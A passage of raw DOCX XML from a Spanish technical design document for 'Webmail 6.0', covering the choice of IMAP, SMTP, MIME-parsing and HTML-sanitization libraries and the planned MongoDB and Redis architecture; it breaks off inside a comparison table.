        <w:t xml:space="preserve">La tabla compara las tres opciones evaluadas. Fastify 4 ofrece el mejor equilibrio entre rendimiento y simplicidad para un proyecto que no requiere la capa de abstracción adicional de NestJS. La serialización schema-based y la arquitectura de plugins encapsulados son ventajas arquitectónicas directamente aplicables a la modularidad del dominio de email (IMAP, SMTP, calendario, adjuntos).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="X720780afe1850d6759da2fabe7038f648d64eab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.3 imapflow — única librería moderna IMAP para Node.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">imapflow (v1.0.164, junio 2026) es el cliente IMAP seleccionado. Es la única librería IMAP moderna y activamente mantenida para Node.js, proporcionando una API promise-based, soporte completo de TypeScript, y manejo automático de extensiones IMAP: CONDSTORE, QRESYNC, IDLE, COMPRESS, y extensiones propietarias de Gmail (X-GM-EXT-1 para labels)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La alternativa histórica,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node-imap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, está en estado de mantenimiento inactivo: último commit hace más de 6 meses, 31 estrellas en GitHub, y sin soporte para las extensiones modernas que habilitan sincronización eficiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[107]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La configuración de imapflow expone parámetros críticos para el rendimiento de Webmail 6.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qresync</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(habilitar QRESYNC para re-sincronización rápida),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">disableAutoIdle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxIdleTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(reiniciar IDLE tras N milisegundos), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">missingIdleCommand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(comando fallback si IDLE no es soportado por el servidor)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[41]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El manejo de mailbox locking integrado garantiza acceso concurrente seguro cuando múltiples workers de BullMQ acceden a la misma conexión IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="nodemailer"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.4 Nodemailer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nodemailer (v6.9.14) mantiene su posición como la librería SMTP dominante para Node.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El transport SMTP soporta conexiones simples (STARTTLS), conexiones pooled (manteniendo conexiones abiertas para mejor rendimiento en envío masivo), y rate limiting configurable. Para Webmail 6.0, Nodemailer maneja: envío de emails nuevos, reenvíos con preservación de headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Reply-To</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(siguiendo el algoritmo JWZ para threading), y envío de invitaciones de calendario como multipart/alternative con componentes text/plain, text/html y text/calendar. El soporte OAuth2 para SMTP es obligatorio: Gmail requiere XOAUTH2 desde marzo de 2025, y Microsoft depreca Basic Auth en abril de 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[58]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[59]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="postalmime"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.5 PostalMime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostalMime (v2.3.2) reemplaza a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mailparser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como parser MIME. La recomendación proviene del propio equipo de Nodemailer: el README de mailparser señala explícitamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">For new projects, please consider using PostalMime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[69]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[77]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PostalMime ofrece ventajas decisivas: cero dependencias, soporte TypeScript nativo, compatibilidad con browser (Web Workers), Node.js y entornos serverless (Cloudflare Email Workers), y protecciones de seguridad integradas (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxNestingDepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxHeadersSize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) que previenen ataques de exceso de anidamiento MIME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[99]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Acepta input como string, ArrayBuffer, Blob, Buffer o ReadableStream, y devuelve un objeto estructurado con headers, from/to/cc, subject, html, text, attachments, messageId, inReplyTo y references</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[101]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Al ser desarrollado por el mismo equipo que mantiene imapflow (postalsys), la compatibilidad entre ambas librerías está garantizada —una propiedad que no existe al mezclar librerías de autores diferentes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="dompurify-sanitize-html"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.6 DOMPurify + sanitize-html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La estrategia de sanitización HTML utiliza ambas librerías en capas diferentes, resolviendo el conflicto documentado en la investigación: DOMPurify atrapa más casos de borde en vectores XSS avanzados, mientras que sanitize-html ofrece mejor rendimiento para procesamiento masivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La arquitectura de Webmail 6.0 asigna DOMPurify al lado cliente (prevención de XSS en el browser del usuario, con configuración que permite solo un subset seguro de etiquetas:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">br</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">validado,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">img</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">data-URI o http/https,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">td</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">li</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y sanitize-html al servidor (procesamiento bulk de emails entrantes antes de almacenar en MongoDB, con políticas estrictas de filtrado CSS y SVG). Esta dualidad de capas —cliente y servidor— constituye la defensa en profundidad que Roundcube no logró implementar, resultando en sus múltiples CVEs de XSS persistente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="juice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.7 Juice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Juice (v10.0.4) inlinea CSS en el momento de envío de email, transformando reglas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en atributos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inline. Esta conversión es necesaria porque la mayoría de clientes de email de escritorio (Outlook, Apple Mail, Thunderbird) aplican filtros agresivos que eliminan etiquetas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o bloques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style scoped&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, rompiendo el layout de emails HTML enriquecido. Juice procesa el HTML del compositor Tiptap, resuelve selectores CSS, y genera HTML con estilos inline que preservan la intención de diseño del remitente. La configuración incluye</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preserveMediaQueries: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para mantener</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@media</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">queries en etiquetas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">separadas, necesarias para layouts responsive en clientes móviles que sí las soportan.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="57" w:name="base-de-datos-y-caché"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Base de Datos y Caché</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="54" w:name="mongodb-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.1 MongoDB 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MongoDB 7.0 es el almacén primario de metadata de email. El diseño de schema sigue la estrategia híbrida recomendada para sistemas de mensajería: documentos embebidos para datos estables (participantes de un thread, asunto, fecha) y referencias para datos que cambian frecuentemente (flags de lectura, labels, estado de draft)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[141]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cada mensaje se almacena como documento en la colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con estructura:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ _id, userId, mailboxId, threadId, uid, flags, headers: {...}, </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  subject, from, to, cc, date, size, hasAttachments, bodyRef, createdAt }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">threadId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—un hash del Message-ID del mensaje raíz— permite recuperar conversaciones completas en una sola query indexada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[184]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La regla ESR (Equality → Sort → Range) gobierna la creación de índices compuestos: para la query de inbox (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mailbox = X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ordenado por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">date DESC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, rango por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), el índice óptimo es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{mailboxId: 1, date: -1, uid: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El límite de 16 MB por documento de MongoDB impone el límite técnico de embedding: los cuerpos de email y adjuntos se almacenan por referencia, no embebidos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[141]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MongoDB Atlas Search (basado en Apache Lucene) cubre el 90% de los casos de búsqueda de email: full-text sobre asunto, cuerpo y remitente; filtrado por fecha y mailbox; autocomplete en barra de búsqueda; y fuzzy matching para typos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[129]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Frente a Elasticsearch, Atlas Search elimina la complejidad operacional de sincronizar un cluster separado y ofrece una API integrada en el aggregation pipeline de MongoDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="redis-7-pubsub-sessions-bullmq-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.2 Redis 7 — pub/sub, sessions, BullMQ 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redis 7.2 cumple cinco funciones en la arquitectura de Webmail 6.0. Primera, almacén de sesiones: la combinación de tokens de acceso en memoria del frontend con refresh tokens almacenados en Redis mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SETEX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con TTL de 7-14 días habilita la invalidación distribuida de sesiones y la rotación de tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[175]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Segunda, caché de cuerpos de email: el patrón Cache-Aside (lazy loading) almacena en Redis los cuerpos de emails recientemente accedidos con TTL de 1 hora, reduciendo fetchs IMAP repetidos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[152]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tercera, pub/sub para notificaciones en tiempo real: cuando imapflow detecta un nuevo email vía IDLE, el backend publica un evento al canal Redis correspondiente; los servidores WebSocket suscritos distribuyen la notificación a los clientes conectados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[139]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cuarta, rate limiting: el algoritmo Sliding Window implementado con Sorted Sets (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZADD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZREMRANGEBYSCORE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZCARD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) ofrece precisión de sub-segundo sin el efecto de burst de los límites de ventana fija</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[158]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quinta, cola de trabajos: BullMQ 5 (estándar de facto en 2026, procesando billones de jobs diariamente) maneja tareas asíncronas —indexación de nuevo email en MongoDB, parsing MIME con PostalMime, extracción y almacenamiento de adjuntos, notificaciones push— con soporte para retries con backoff exponencial, dead letter queues, y OpenTelemetry tracing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[203]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="1344"/>
        <w:gridCol w:w="3287"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capacidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MongoDB 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
